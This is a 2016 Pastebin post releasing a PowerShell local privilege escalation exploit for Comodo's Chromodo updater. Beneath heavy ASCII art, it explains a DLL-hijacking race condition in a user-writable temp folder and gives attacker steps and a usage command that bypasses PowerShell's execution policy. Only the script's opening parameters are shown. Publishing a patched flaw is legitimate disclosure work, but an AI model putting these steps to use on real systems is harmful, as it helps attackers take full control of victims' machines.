Advertisement
Laughing_Mantis

#DragonPunch Comodo LPE Exploit by @Laughing_Mantis

Mar 10th, 2016
1,127
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. <#
 2.  
 3.   ██████╗ ██████╗  █████╗  ██████╗  ██████╗ ███╗   ██╗    ██████╗ ██╗   ██╗███╗   ██╗ ██████╗██╗  ██╗  ██╗
 4.   ██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗  ██║    ██╔══██╗██║   ██║████╗  ██║██╔════╝██║  ██║  ██║
 5.   ██║  ██║██████╔╝███████║██║  ███╗██║   ██║██╔██╗ ██║    ██████╔╝██║   ██║██╔██╗ ██║██║     ███████║  ██║
 6.   ██║  ██║██╔══██╗██╔══██║██║   ██║██║   ██║██║╚██╗██║    ██╔═══╝ ██║   ██║██║╚██╗██║██║     ██╔══██║  ╚═╝
 7.   ██████╔╝██║  ██║██║  ██║╚██████╔╝╚██████╔╝██║ ╚████║    ██║     ╚██████╔╝██║ ╚████║╚██████╗██║  ██║  ██╗
 8.   ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═══╝    ╚═╝      ╚═════╝ ╚═╝  ╚═══╝ ╚═════╝╚═╝  ╚═╝  ╚═╝
 9.  
 10.  
 11.                                                                                                      
 12.                       .-:/+oossoo++:-.                                      
 13.                   `-/ossyyhhhhddddddddddy+-`                                `.-:-..`                    
 14.                 -+ossyyhhhdddmmmmNNNNNNNmmmdo-                      ``-:+oyhddhys+osyyso+/:-``            
 15.              `:oossyyhhddddhysoooooosydNMNNNmmh/`              -oyddddysso+//++oy++//://+ooyhhhhyo-      
 16.             :oossyyhhdhs/-..---::----...-+yNNNmmh:            `mm+ooossssssssssss++++++++///::::/dd.      
 17.           `+oosyyhhho-..-:///++++/oshmy::-..+dNmmdo`          -Ny+dyssssssssssoos++++++++///////-yd-      
 18.           .oossyyhh+..-://++++oyhdNNNNNd-o+/:--ommmdy.         -my/hssssssssssssssoooo+++++++////-yh-      
 19.          .oossyhho.`-:///+shmNMMNNNNNNNo-yhs+///+dmddy`        -my/yssssssyyyyhhhyyysssssooo+/::--o/-      
 20.          +oosyyy+``-:+oydmNMMMMMNNNNNmo-:dNmhs/+++dddho        -dy/sooossyhdhddddmmmmddddddo+::---o:-      
 21.         :+osyyy+``:oyhhdmmNNMMMMNNds/--:oMMMNds/oosddhy-       -dy/ooosyydhmMMMMMMMNNNNNmds+:::---s/-      
 22.         ++osyyo:`/ssyhhddmmNNdyo/---::/sNMMMNmy+osshhhy+       -hy/ooosyhhMMMMNhyoo+++++++/:::::--s+-      
 23.         o+osyo+:+ossyyhhhs+-..---::-:odNNNNNNdyo/yyyhyyo       -ys:++osysMMMMMso//:::::::::::::::-yo-      
 24.         ++oss++oooosss+-`...-:--.` /mNNNNNNmmdy+/yhhyyso       .ys:++o+shMMMMdo///:::::::::::::::-yy-      
 25.         +/+oo++++ooo/....-:-:/y+   +mmmmmmddhyo/+hhhyss+       `ss-////omMMMMyo/////////::::::::::yh`      
 26.         ///+o//++++-..--/-:syhdd. `ymddddhhyyo+:yhhhsso:       `sy-:://+NMMMMyo//+//////////:::::/hd      
 27.         .///+///++:---:+-:oosyyh/ :hhhhyyysso/:odddyoo+`       .dd-:::/ohMMMMNhysyssssssyys//:::+/hd      
 28.          :////////-:::/+-:/+oosy+.yysssssoo/:-odddhoo+:         yN:-:::/ohNMMMMMMMMMMMMMNyo//::/s+Nh`      
 29.           :///////:////o--////+o:oooooo++/:--ydddho++:          -mh-:::::/+syhdddmdddddhs+//::/sohN:      
 30.            :::::////+++os--:///++++////:-.-sdddmy+++:            :my---:::::::///s+++++/////:/oohN+        
 31.             .::::://ooossyo:..------...:+ymdmmho++/.              -hh/-----------+/////////:/+odm:        
 32.              `-:::::/osyyyyhys++//++syddddmdho+//-`                `+hy:---------///////:://ohms`          
 33.                `-:::::/oyyhhhhhhddddddddhyo////-`                    .+hy+-------/:::::::/ohho.            
 34.                   .-:::::/osyyhhhhhyso+////:-`                         `:oys+:---/::::/osys:`              
 35.                      `.--:::::::::::::::-.`                               `:+sso++:+ooo+:`                
 36.                            ```````.``                                        `.:+o+:-.``                                                                                                                
 37.                                                    `..-.                                            
 38.                                                 `.//+hs++.                                          
 39.                                               `:-:+yh+osh-                                          
 40.                                               .sssyyo:-::::                                        
 41.                                                .oddsoho/.:+`                                        
 42.                                                 :sdyo/osshh`                                        
 43.                                                  `:ohsyhdmh:.                                      
 44.                                                    /MMMMNmmN/                                      
 45.                                                    /MMMMmmdm/                                      
 46.                                                    -ydmNNmh+--`                                    
 47.                                                     `yyoys+-..--                                    
 48.                                                      ys+y+--...--`                                  
 49.                                                      s+:o/-....-/.                                  
 50.                                                      o+:+/:---..:.                                  
 51.                                                      :/++++:--../.                                  
 52.                                                       .y+oy/:---o.                                  
 53.                                           `:sssssso../oyoos/--:+y.                                  
 54.                                          `hmmdhhhhyyhmmdho/-..:+y.                                  
 55.                                         /hNmddhyddyddmNMNs--...-s.                                  
 56.                                         oMMNmddhNNmNMMNdMh:-....+.                                  
 57.                                         /hNMMNmdNNdmmmmdhyo:--..+.                                  
 58.                                          `ymmdhhhhhssdhy///-..:+o.                                  
 59.                                          `sdmdhdmmd::dyo:-.--::/y.                                  
 60.                                            /Nhhyood+/syy+:-.`.:/y.                                  
 61.                                           `odoyyo+y+:`/y+++/-.`.o.                                  
 62.                                        `-//yd:oy:.-.-o:```.//.``/.                                  
 63.                                      ../+sdddoyy////+s:`   -:.` +.                                  
 64.                      -/---:`   ` `---:-..:d+:-oy-.``.so/`  ..`  /.                                  
 65.                    `-::.sh:..:-.://+++:` `/.  .:`   `:oy`  ..  `o.                                  
 66.                    .o:+ddds:-hho/:-:/sss:.           `+y`  .. `.y.                                  
 67.                   `-ymNMNd::/ys:.``..-:ohs.` ````   ``+y```.` `-y.                                  
 68.                    .hNMMNNsdmho:-.....-:yo.````.`  ``.oy```.` -/o`                                  
 69.                     `sNmhdNMNyso/:---:/+yo-.`...`  ...oy```.` /+`                                  
 70.                      oMNmNNds:/+++://+osys/--..`  `.-.oy```.` /+                                    
 71.                      +h/yyo/-..-///:/+++hy+:..`  `..--oy```.` /+                                    
 72.                      /o.os-....-//-+s++shy/.````.-:--+sy--:``./:                                    
 73.                      /+.os:----///-sdyhho:.``..-/:.-:yhy+:.`.o.                                    
 74.                      /o-+oo/-//::/ssyhyo/:-::://:-`/ydyo:.`/++.`                                    
 75.                      /o:-.---//+s+/``:////:///:.`.:ydyo:.:ody`+y:`                                  
 76.                      .:+:--:/+:--`    .hsoo/:..`-/hhs//+shmh+ +h+/:                                
 77.                        `-/:.``       /oy++hyyhhhmmNmmddmdy+.`./+..-..                              
 78.                                      ss-:::::+++ooooo+/:``.---/o-.``````                            
 79.                                      s+```.--:::-.``````.-:..`+y--.`` ``.``                        
 80.                                      so.```   `.--:-..`.-.``.:sh+:-...````..`                      
 81.                                      odyo+/-.```  ```.```.-+shhhysssoo:..``-:/                      
 82.                                     .ohsyhhhhyso//:::/+oyhdddhhyyssso+osy:``:s`                    
 83.                                    -dho----:/oyhhdmmmmmmdddso////-.://oo/-.:+o                      
 84.                                    -d+-``````-:+syhdmmmdyo+-.``..--..`.--/+/.                      
 85.                                    -d-.```````.-/ohddds++oso/.``````..::+o+                        
 86.                                    -d:.````````-/ohys+++-..os+.````...///`                          
 87.                                    -ds+:---.``.-/sds+:/+-../oy:`....-/-.                            
 88.                                   `:h+:.``````.-+sds+//+---+sd/....///                              
 89.                                   hyo://::.`  `-shdhs+/:--:sdd+.`-/:`                              
 90.                                   hdho/-.....``.yhhso++/.-+hmd+-o++                                
 91.                                   hyo:-::::--:::hdy+/://.:sooso/:`                                  
 92.                                 .+yo/:.````..:+yddy+::::..`-++.`                                    
 93.                                 /dy/.```     .+hddyso++/-.                                          
 94.                                 /do:.```     `-oddysoys+-`                                          
 95.                                 /ho/-..```````-/ho//oys/:`                                          
 96.                                 /dyyo/-..```...-y- `...`                                            
 97.                                 /dho/-.``  ``..-s-                                                  
 98.                                 /dh:.`-++++:-``.s-                                                  
 99.                                 /dh/:osysyhhh-.`s-                                                  
 100.                                 .:hyys+//+yhhh/.o.                                                  
 101.                                   +oy+//::/+omy/`                                                  
 102.                                    -y+:-----:h/-                                                    
 103.                                    -y////++/-.                                                      
 104.                                    -yso+++++:                                                      
 105.                                    -yys++++.`                                                      
 106.                                   .-so++///`                                                        
 107.                                   o+///:-:/`                                                        
 108.                                   s/-::---:`                                                        
 109.                                   s/://:::/`                                                        
 110.                                   //+++++/:`                                                        
 111.                                    `-----`      
 112.  
 113.  
 114.  
 115.  
 116.              ██████╗ ██████╗ ███╗   ███╗ ██████╗ ██████╗  ██████╗      █████╗ ██╗   ██╗      
 117.             ██╔════╝██╔═══██╗████╗ ████║██╔═══██╗██╔══██╗██╔═══██╗    ██╔══██╗██║   ██║      
 118.             ██║     ██║   ██║██╔████╔██║██║   ██║██║  ██║██║   ██║    ███████║██║   ██║      
 119.             ██║     ██║   ██║██║╚██╔╝██║██║   ██║██║  ██║██║   ██║    ██╔══██║╚██╗ ██╔╝      
 120.             ╚██████╗╚██████╔╝██║ ╚═╝ ██║╚██████╔╝██████╔╝╚██████╔╝    ██║  ██║ ╚████╔╝      
 121.              ╚═════╝ ╚═════╝ ╚═╝     ╚═╝ ╚═════╝ ╚═════╝  ╚═════╝     ╚═╝  ╚═╝  ╚═══╝        
 122.                                                                                  
 123.           ██╗     ██████╗ ███████╗    ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
 124.           ██║     ██╔══██╗██╔════╝    ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
 125.           ██║     ██████╔╝█████╗      █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║  
 126.           ██║     ██╔═══╝ ██╔══╝      ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║  
 127.           ███████╗██║     ███████╗    ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║  
 128.           ╚══════╝╚═╝     ╚══════╝    ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝  
 129.                                                                                  
 130.                                       ██████╗ ██╗   ██╗                                        
 131.                                       ██╔══██╗╚██╗ ██╔╝                                        
 132.                                       ██████╔╝ ╚████╔╝                                        
 133.                                       ██╔══██╗  ╚██╔╝                                          
 134.                                       ██████╔╝   ██║                                          
 135.                                       ╚═════╝    ╚═╝                                          
 136.  
 137.                 ██╗      █████╗ ██╗   ██╗ ██████╗ ██╗  ██╗██╗███╗   ██╗ ██████╗
 138.                 ██║     ██╔══██╗██║   ██║██╔════╝ ██║  ██║██║████╗  ██║██╔════╝
 139.                 ██║     ███████║██║   ██║██║  ███╗███████║██║██╔██╗ ██║██║  ███╗
 140.                 ██║     ██╔══██║██║   ██║██║   ██║██╔══██║██║██║╚██╗██║██║   ██║
 141.                 ███████╗██║  ██║╚██████╔╝╚██████╔╝██║  ██║██║██║ ╚████║╚██████╔╝
 142.                 ╚══════╝╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝ ╚═════╝
 143.                                                                
 144.                      ███╗   ███╗ █████╗ ███╗   ██╗████████╗██╗███████╗          
 145.                      ████╗ ████║██╔══██╗████╗  ██║╚══██╔══╝██║██╔════╝          
 146.                      ██╔████╔██║███████║██╔██╗ ██║   ██║   ██║███████╗            
 147.                      ██║╚██╔╝██║██╔══██║██║╚██╗██║   ██║   ██║╚════██║          
 148.                      ██║ ╚═╝ ██║██║  ██║██║ ╚████║   ██║   ██║███████║          
 149.                      ╚═╝     ╚═╝╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝╚══════╝      
 150.  
 151.  
 152.                                   `-:/+osyyhhhhhhyyso+/:.`                                          
 153.                             `-/oyhhyso+/:--.....--::/+osyhhyo/-`                                    
 154.                         .:ohhyo/-``      `   `.+. `      `.:+syhy+:`                                
 155.                      -+yhs+-`    .``++--yy/  hod-syy.:+/`:/`   `:oyhs/.                            
 156.                   .+yhs:`  .+::`yoh-oso-doo  hod-d+y.ssh.h/   -`  `./shs/`                          
 157.                `:shs/``  :s.ysy++yy+-++`-:.  ... -:..+o/+s`/-osy+/`  `.+yho-                        
 158.              `/yho-` `s/ `oy-y+o...`.-:/+oossssssoo+/:-```  /ossss-o-.  `:shs-                      
 159.             :yho.  `://so` //``.:oyhhhddddddddddddddddhhys/-.`-:o/yoy//o`  -sds.                    
 160.           .sdo.    -ysy/+- `-+yhddddddddd0days0daysyhdddddddhs/-`./s/os//:`  -yh+`                  
 161.          /hy:  `:+. .o+- -+yhddddddd/-.```+y   odd:``.:/o+:ddddhy/.`-+/syy:`  `/hy-                
 162.        `sdo`  .-yh+o  `:sdddydddddds+`    :y:./osd.     `+-hdddhhdho- :o+:+so   .yd/                
 163.       .yd/  `+so+o+- :yddddyddddoyyho     +ds-/``s`    ``sh+/yddyhddho. .ss/-    `odo`              
 164.      .hh:  `-+sso: .sddddhshdddh-yhhh-````sdy`.+o+-   -yyydds-hddshdddh+`..`  .:/  +ds`            
 165.     .hh-  `ssso:- :hddddo-yddhy+/yhhdhhhho+++--+:./syyyysyyhh+oddh:yddddy.  :oo+-   +ds`            
 166.    `yd:    -+os.`+ddddy- /ds+oyhddddddddd+/ssoooo/sdddy--:::-/+yhd/`/hdddh: -.`.:o-  od+            
 167.    od+  `+:--` `odddds`  /syhdddhhyhhddhhhhhhhhhhddddds--/+o++++oys  -hdddd: `oo+//: `yd:          
 168.   -dy`  -sooy. +ddddy`  .ydddddddhysooy/..-+oooosyyyhsshhysssydhyy-   .ydddd- -ossy+  .dh`          
 169.   yd-  -os+o. :dddddhs+`oddddddhhs//yhso+:         `+hdhossyhhddddo`   .hdddh. /oo+:`  od+          
 170.  -dy   :++ss `hddddddd+ydddddo-.`   `odh:`         oddhhh+/::+yddddy+/+/ydddds/+yhdhs//odh+//-.`    
 171.  od/  `osoo. /dddddddddddddds`        +dh.`       /ddh..`     `sdddddddddddddddddddddddddddddddy/`  
 172.  yd.  -shhs` ohhhhhhhydddddh`         `sdss+````/`/dds         .ddddddhhhhhhhhhhhhhhhhhhhhhhhddddh:
 173. `hh`  .::::  ````` ` `ddddd:           -dddyhddsh.-hds          sddddo                      `:ydddd:
 174. .dh  ://:/- .hhhh+    hdddy            `dddddddhd:/hdh`         /dddds                        `hdddy
 175. .dh  ---::- .dddd+    oddds            odddddddsdh+dddo         +dddd/                         hdddh
 176. `dh` -://+/ `dddds    -dddd.         `oddddddddyhdsoddds.      :ddddy`                       .sdddd/
 177.  hd. -oyssy` ydddh`   :dyhddo/---.-:+dddddddddddydds+ddddysooshddddho    .ooooooooooooooooosyddddd+
 178.  sd:  `/++o. +dddd:   :dh//yddddddddddddddddddddh/hdh+sdddddddddddyy+    odddddddddddddddddddddds-  
 179.  :ds   ssss/ `ddddy`  -ddsy/-+syyyhyydddddhdddddd-.hddyosyhddddddddo`   .ddddhssyhddyssyddsso+:`    
 180.  `hd.  .:+/o- /ddddo  `hdy+dhyssssshdddddhsddddddo./dddyhys+ohddddh`   `ydddd. +oo+-`  +do          
 181.   /ds   oyys+` sdddd/`/ddd/sdddddddddddddyddddddddh+hdy-+shddddhsdh+:``sdddd/ `+ssy/  `hd.          
 182.    sd:  `//os: `yddddyddddh-hddddddddddhyyhhhyyoo/-`/o+dddddddhodyyddosdddd+ .yso+.   od/          
 183.    .hh. `+++/o+``sdddhhddddy/hddddddddssossss++///o+/o+/hddddhoddyydyhdddd+.:/oss+`  /ds`          
 184.     -dy.  .yyso```+ddddhhdddh+sddddddo`/yddddddddhyoydds-dddd/hddy+dddddh: oyyso-`  :dy`            
 185.      :dy.  ./+/s+. :ydddhyddddo/ydddd.:hdddddddddh-`:hdh/dddy/dddyhdddds. :o+oso`  :hy.            
 186.       :hh-  `o/+sso:`+hddhyhdddhooddy.hdddddddddd+ sdddddddd+hdhhydddy:``/ssss/`  /dy.              
 187.        -yh/   :yss:`.`.+hdddyddddyddh/dhydddddddd/`dddddddd+ydyhdddy:` .os++o:- `odo`              
 188.         `ods.  .-``+ss: `/shdydddd+dddddsddhhyhddo`oddddddh/sdhyyo-``+++yddy.  -yh/`                
 189.           :yh/`  -syso- :.`./yddddssdddh/o////osyyyyyyohddsydddd-..+yyddddddhs+hs-                  
 190.            `+hy:``.-/.`os. :-ohdddds/oso:-:///++/:--/ssoohddddy+oyssdddshdddds+y.                  
 191.              .ohy/` .-s+`  .yoo+dddyo/.``ohddddddds`  -syhydh/+shdddhhdydddy+oyd+                  
 192.                .+hy+-`.    +ss-ysdys.   `hddddddddh``  `+dddshd+sddo:hddhhoss+:ho                  
 193.                  `:shy/.`  .-.-yyhs`/sss++ys++++ss/oss/` odddh/sdd/-hdysdh++yd:d:                  
 194.                     ./shy+-.`  `:h./ddddds+yhdhys::hddds`.ddh/ydd+/hdoydh:/hdy/y`                  
 195.                        .:oyyso/--y oddddy+ddhhhoydoodddd: yshhdd/sdh+hdy-/+ys:+-                    
 196.                            .:+shss +dddds+ddsdy+ydsodddd- s:hdd++dh/yds:++y:+:/                    
 197.                                 `y-.ddddd++yhdddhy/hddd+ -s`hdh-ddoo/s//sh:+-/                      
 198.                                  -y.:yhhy//ooossyhs://. .s..dd/oddo+++o+h:/-:                      
 199.                                   -y-    odddddddddo   -s. `hd.ddy+`/shdh//.                        
 200.                                    .so.  -+oyyyyo+:` .o+`   oh-dds+++ods/:`                        
 201.                                      -os/-`      `./oo.      .`ydoo:+ -/.                          
 202.                                         -/+ooooooo/-`           ``:++:-                                                                                            
 203.             `.                                                            
 204.             -m:                                                            
 205.             /MN+`                                                          
 206.             oMmNs.                                                        
 207.             yM+yNh:.`                                                      
 208.             hM+/omm+--`                                                    
 209.             hM+///hNh/--.`                                                
 210.             sMo////odNs::--.``                                            
 211.             :Mh//////smms/:----.```                                        
 212.              hNo///////sdmy+:--::----....````               ``````````    
 213.              .Nm/////////ohmds/:--:::::::-----.`   ``...-----------:--    
 214.               /Mh//////////+shmmyo+:::-:----.``..-----::-:::::::::::--    
 215.                sNy////////////+oyhdmdy+/-.``.--::-::::::::::::::::::--    
 216.                `sNy////////////////+oydmd+/::::::::::::::::::::::::::-    
 217.                 `oNh+//////////////////+shmmy+::--:::::::::::::::::::-    
 218.                   :dms////////////////////+ohmdo:--:::::::::::::::::--    
 219.                    `omdo/////////////////////+smms/-::::::::::::::::--    
 220.                      .odds+/////////////////////smms:--::::::::::::::-    
 221.                        ./hmhs+////////////////////smd+:::::::::::::::-    
 222.                          `-+hddyo+/////////////////+dNy:-:::::::::::--    
 223.                              .:smNmhso+//////////////sNd/::::::::::::-    
 224.                                -md/+hMmdhs+///////////oNm/--:::::::::-    
 225.                               .md. -dmyyhmmdho+////////oNm/:::::::::--    
 226.                               yN- .mmsoooosdMMmho+//////oNd:::::::::--    
 227.                              .Nh  sMyoooosmMMmddmmho/////yMy:::::::::-    
 228.                              :Mo  dNooooohMMmyssyhMNds+///dM+--::::::-    
 229.                              -Ms  hNsooooyMMNyyyyhMMNmmy+/oMd:-:::::--    
 230.                              `mm` /MhooooohNMNNmNMMmssymmy+mM/-:::::--    
 231.                               +Mo  yNyoooooshdmmmdyooooohNmmMs-:::::--    
 232.                                yN/ `oNdsoooooooooooooooymysNMd:::::::-    
 233.                                `sNs` -ymdysoooooooosshdd+``+hm:::::::-    
 234.                                  :dd+. .+hdddhhhhhddds:``-yd:+/::::::-    
 235.                                   `/hdy/.``.:////:-.``-ohms-`--::::::-    
 236.                                      -+hmhyo+/:::/+sydds:`    ---::::-    
 237.                                         `-:+ossyss+/:.         ---:::-    
 238.                                                                 .-----    
 239.                                                                  .----    
 240.                                                                   .-:-    
 241.                                                                    .--    
 242.                                                                     .-    
 243.                                                 CYBERPOINT SRT       `  
 244.  
 245.    
 246.  * -----------------------------------------------------------------------------
 247.  * "THE BEER-WARE LICENSE" (Revision 29A):
 248.  * @Laughing_Mantis wrote this file.  As long as you retain credit and include
 249.  * at the least 1 ASCII art design you can do whatever you want with this stuff.
 250.  * If we meet some day, and you think this stuff is worth it, you can buy me a
 251.  * preferably non-roofied drink in return.                      
 252.  *                                                              @Laughing_Mantis
 253.  * -----------------------------------------------------------------------------
 254.  
 255. ██╗███╗   ██╗████████╗██████╗  ██████╗ ██████╗ ██╗   ██╗ ██████╗████████╗██╗ ██████╗ ███╗   ██╗
 256. ██║████╗  ██║╚══██╔══╝██╔══██╗██╔═══██╗██╔══██╗██║   ██║██╔════╝╚══██╔══╝██║██╔═══██╗████╗  ██║
 257. ██║██╔██╗ ██║   ██║   ██████╔╝██║   ██║██║  ██║██║   ██║██║        ██║   ██║██║   ██║██╔██╗ ██║
 258. ██║██║╚██╗██║   ██║   ██╔══██╗██║   ██║██║  ██║██║   ██║██║        ██║   ██║██║   ██║██║╚██╗██║
 259. ██║██║ ╚████║   ██║   ██║  ██║╚██████╔╝██████╔╝╚██████╔╝╚██████╗   ██║   ██║╚██████╔╝██║ ╚████║
 260. ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝ ╚═════╝ ╚═════╝  ╚═════╝  ╚═════╝   ╚═╝   ╚═╝ ╚═════╝ ╚═╝  ╚═══╝
 261.                                                                                                
 262.    
 263.  
 264. Recommended For Your Listening Pleasure For This Text Only Release:
 265. https://www.youtube.com/watch?v=Iof5pRAIZmw
 266.  
 267. Discovered this vulnerability in about 30 minutes using ProcMon + ProcExplorer
 268. Comodo took 152 Days to Fix
 269.  
 270. Again since this is an early 2000's style vulnerability - why not treat it like one?
 271. 30 minute discovery time
 272. 1 hour 15 minute analysis and write up time
 273. 3 hour ASCII art design
 274.  
 275.  
 276.  ██████╗ ██████╗ ███████╗███████╗████████╗███████╗
 277. ██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝
 278. ██║  ███╗██████╔╝█████╗  █████╗     ██║     ███╔╝
 279. ██║   ██║██╔══██╗██╔══╝  ██╔══╝     ██║    ███╔╝  
 280. ╚██████╔╝██║  ██║███████╗███████╗   ██║   ███████╗
 281.  ╚═════╝ ╚═╝  ╚═╝╚══════╝╚══════╝   ╚═╝   ╚══════╝
 282.  
 283. CyberPoint SRT Team & @tacticalRCE - Cheers and thanks for the fish                                                
 284.                              
 285. @SecuriTay Yous da best Tay tay
 286.  
 287. @SecurityBeard Lets make the next Blackout Crew
 288.  
 289. @Scanlime RESPECT to everything you do
 290.  
 291. @qwertyoruiop is def the trump of jailbreak - hows that wall going?
 292.  
 293. @TravisGoodspeed Thanks for your blessing - POC||GTFO is so rad and such an inspiration
 294.  
 295. @Sc00terSec HOW MUCH IS DA PHISH?! CYBER! CYBER!
 296.  
 297. @Threatbutt #ThreatbuttMarketingTeamForLife!
 298.  
 299. @badd1e Awesome is indeed timeless - hope you are well
 300.  
 301. @Tferris has the best flash fuzzing files ever
 302.  
 303. @DA_667 SUPER LEGIT THOUGHT LEADER
 304.  
 305. @K4dl & @bonovoxly FASTER! HARDER! SCOOTER! https://www.youtube.com/watch?v=7aRbQKUJPA8
 306.  
 307. Team Cyberpathogen FTW
 308.  
 309. Fei Long Players are legit - RESPECT to you esp if you drive a VDub
 310.  
 311. Vectra Threat Research - REDI ROOM?!
 312.  
 313. NUKE & SLAM brothers and sisters you are missed
 314.  
 315.  
 316.  
 317. ███████╗████████╗ █████╗ ██╗   ██╗████████╗██╗   ██╗███╗   ██╗███████╗██████╗
 318. ██╔════╝╚══██╔══╝██╔══██╗╚██╗ ██╔╝╚══██╔══╝██║   ██║████╗  ██║██╔════╝██╔══██╗
 319. ███████╗   ██║   ███████║ ╚████╔╝    ██║   ██║   ██║██╔██╗ ██║█████╗  ██║  ██║
 320. ╚════██║   ██║   ██╔══██║  ╚██╔╝     ██║   ██║   ██║██║╚██╗██║██╔══╝  ██║  ██║
 321. ███████║   ██║   ██║  ██║   ██║      ██║   ╚██████╔╝██║ ╚████║███████╗██████╔╝
 322. ╚══════╝   ╚═╝   ╚═╝  ╚═╝   ╚═╝      ╚═╝    ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚═════╝
 323.                                                                              
 324. #Infosec community I am happy to give back to all of you and for that I
 325. will be announcing something very special in the near future that will
 326. be featuring a lot of really rad people that I respect in the community.
 327.  
 328. Expect Ascii Art, Code, Lolz, and maybe some one will drop the bass
 329.  
 330.  
 331.  
 332.  
 333. ████████╗███████╗ ██████╗██╗  ██╗██████╗ ███████╗████████╗ █████╗ ██╗██╗     ███████╗
 334. ╚══██╔══╝██╔════╝██╔════╝██║  ██║██╔══██╗██╔════╝╚══██╔══╝██╔══██╗██║██║     ██╔════╝
 335.    ██║   █████╗  ██║     ███████║██║  ██║█████╗     ██║   ███████║██║██║     ███████╗
 336.    ██║   ██╔══╝  ██║     ██╔══██║██║  ██║██╔══╝     ██║   ██╔══██║██║██║     ╚════██║
 337.    ██║   ███████╗╚██████╗██║  ██║██████╔╝███████╗   ██║   ██║  ██║██║███████╗███████║
 338.    ╚═╝   ╚══════╝ ╚═════╝╚═╝  ╚═╝╚═════╝ ╚══════╝   ╚═╝   ╚═╝  ╚═╝╚═╝╚══════╝╚══════╝
 339.                                                                                      
 340. Updates for Comodo's browser, Chromodo, are performed automatically or whenever a user launches the browser
 341. and goes to the "About Chromodo" option and selects update browser.
 342.  
 343. Chromodo Updates are downloaded and stored in the insecure folder C:\Users\<USER>\AppData\Local\Temp\NSX###.TMP
 344. path (where as # represent a random number and X is a random letter).   This folder by default has writeable
 345. permissions by the currently logged in user.
 346.  
 347. C:\Users\User\AppData\Local\Temp NT AUTHORITY\SYSTEM:(OI)(CI)F
 348.                                  BUILTIN\Administrators:(OI)(CI)F
 349.                                  DESKTOP-PRABIAQ\User:(OI)(CI)F
 350.  
 351. Updates are initially checked by the SYSTEM service C:\Program Files (x86)\Comodo\Chromodo\chromodo_updater.exe.  
 352. This service is auto executed on system start by the registry key - HKLM\System\CurrentControlSet\Services\ChromodoUpdater.
 353.  
 354. After this binary determines a update is available it will download and copy the update, as well as
 355. chromodo_setup.exe, to the C:\Windows\Temp\ folder.  This binary is then executed with SYSTEM level privileges
 356. with the command line "C:\Windows\temp\chromodo_setup.exe --silent".  However the current directory and the
 357. other components of the update are both set to C:\Users\User\AppData\Local\Temp\nsX###.tmp folder.
 358.  
 359. Upon updating, the Chromodo_Setup.exe will create this temp nsX###.tmp folder and begin file extraction
 360. from \Windows\Temp\ to this folder.  
 361.  
 362. During this time the following DLL files are extracted to the insecure User's Temp folder and can be hijacked:
 363. - System.dll
 364. - DragonPlugin.dll
 365. - SecureDNSPlugin.dll
 366. - InstallHelperPlugin.dll
 367. - AccessControlW.dll
 368. - NsJSON.dll
 369.  
 370. A local attacker can then create an application to monitor the C:\Users\User\AppData\Local\Temp\ folder
 371. for any creation of the temp folders.  When an update is available, the application can then beat the
 372. race condition and then plant a malicious DLL in the folder before the legitimate DLL is copied.  
 373. These DLL files are then loaded at SYSTEM level privileges into Chromodo_Update.exe, however after gaining
 374. elevated privileges the malicious attacker should migrate to a new process, write another file, or stay
 375. persistent so the application can install the legit DLL in order to prevent a failed Chromodo update.
 376.  
 377.  
 378. ██╗   ██╗███████╗ █████╗  ██████╗ ███████╗
 379. ██║   ██║██╔════╝██╔══██╗██╔════╝ ██╔════╝
 380. ██║   ██║███████╗███████║██║  ███╗█████╗  
 381. ██║   ██║╚════██║██╔══██║██║   ██║██╔══╝  
 382. ╚██████╔╝███████║██║  ██║╚██████╔╝███████╗
 383.  ╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝ ╚══════╝
 384.                                          
 385.  
 386. DragonPunch.ps1 will monitor the User's AppData Local Temp folder for any creation of files.
 387. Upon discoverying a newly added file or folder the exploit will drop the specified DLL in
 388. the modified folder as "DragonPlugin.dll" (by default).
 389.  
 390. Exploitation should be achieved by running this exploit and then launch Comodo's browser, Chromodo, which comes
 391. by default with Comodo CIS.  The local attacker should then go to the "About Chromodo" option and selects update
 392. browser to trigger the race condition and LPE.
 393.  
 394. Example Usage
 395. Powershell -ExecutionPolicy Bypass -File DragonPunch.ps1 -DLL C:\Exploitz\DLLHijacker.dll
 396.  
 397. -File should be your own DLL file that you are attempting to hijack DragonPlugin.dll with.
 398. Bonus Points for DLL that includes GuileTheme.mid as a resource and plays it upon exploitation
 399.  
 400. ███████╗██████╗ ██╗      ██████╗ ██╗████████╗███████╗
 401. ██╔════╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝╚══███╔╝
 402. ███████╗██████╔╝██║     ██║   ██║██║   ██║     ███╔╝
 403. ╚════██║██╔═══╝ ██║     ██║   ██║██║   ██║    ███╔╝  
 404. ███████║██║     ███████╗╚██████╔╝██║   ██║   ███████╗
 405. ╚══════╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝   ╚══════╝
 406.                                                      
 407. #>
 408.  
 409. Param
 410. (
 411.  
 412.     [Parameter(ValueFromPipelineByPropertyName = $true)]
 413.     [string]$DLL = ""
 414. )
 415.  
 416. $Target = "DragonPlugin.dll"
 417. <#
 418. ALSO VULNERABLE:
 419. - System.dll
 420. - SecureDNSPlugin.dll
 421. - InstallHelperPlugin.dll
 422. - AccessControlW.dll
 423. - NsJSON.dll
 424. #>
 425.  
 426. $Interval = 1500
 427. # Change the interval here if exploit race-condition is not being defeated
 428. # (Win 7 x64 VM w/ 8GB RAM tested @ 1500ms)
 429. # System.dll is usually the first written and needs approx 500ms or less
 430.  
 431.  
